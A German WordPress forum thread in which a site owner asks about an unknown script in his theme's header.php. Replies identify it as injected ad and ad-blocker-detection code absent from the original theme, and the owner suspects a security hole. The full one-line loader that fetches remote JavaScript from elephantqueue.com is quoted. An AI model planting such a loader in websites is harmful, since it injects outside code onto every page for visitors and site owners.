Komisches Script im Header

• Liebe Wordpress-Freaks,

ich habe heute wieder etwas an meiner Webseite gearbeitet. Ich habe dabei ein komisches Script im Header gefunden (siehe Snippet). Wenn ich dieses aber aus dem Header entferne, bekomme ich einen weißen Strich über dem Content. Was ist diese Seite? Google bringt, ja diese mal wirklich, 0 passende Ergebnisse.

Hier der Code:

PHP
    <script>(function(a,b,c,d,e){e=a.createElement(b);a=a.getElementsByTagName(b)[0];e.async=1;e.src=c;a.parentNode.insertBefore(e,a)})(document,'script','//elephantqueue.com/b56e72c897d77b2c0f7b1994e62a86599a8dd15b79bdb9b5042b8b33257b66948a5cebbbf476d3eed50cb4a36dadf2421fb85e350c6a722313c472714384');</script>

Vielleicht kennt ihr dieses Script oder könnt mir sonstige Tipps geben! Danke!

LG David

• Anzeige

Hallo!

Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

• ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

Mehr erfahren

• [FONT=arial]ruf[/FONT] mal [COLOR=#000000][COLOR=#DD0000]elephantqueue.com [/COLOR][/COLOR]auf. Scheint zur Prüfung von Copyrights vom Anbieter eingebaut zu sein.

• [FONT=arial]ruf[/FONT] mal [COLOR=#000000][COLOR=#DD0000]elephantqueue.com [/COLOR][/COLOR]auf. Scheint zur Prüfung von Copyrights vom Anbieter eingebaut zu sein.

Hab ich bereits aufgerufen - hilft mir nicht recht weiter. Keiner kennt das und das Google hierbei nichts findet, ist auch merkwürdig. Welcher Anbieter soll das sein? Ich betreibe doch alles selbst.

Wenn man den Code liest, z.B. mit Hilfe http://jsbeautifier.org/ o.ä., fällt sogleich auf, dass Werbeblocker und vorhandene Werbebanner gesucht werden und eigene Werbebanner des Scripts ins Spiel kommen. In welcher Datei genau steht das Script?

Keine Ahnung, ich wunder mich trotzdem was das ist und wie das reinkommt. In der header.php.

• Weder in der Demo noch im Download des Themes ist dieses Script vorhanden (mein diesbzgl. Posting mit Links hängt leider in der Moderation). Würde empfehlen, die Originaldateien des Themes zu verwenden.

• Klar verwende ich die Originalen Dateien des Entwicklers. Vermutlich hat sich das Script durch eine Sicherheitslücke oder kA eingeschleust - jedenfalls keine Ahnung, seit wann das im Theme ist ...

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!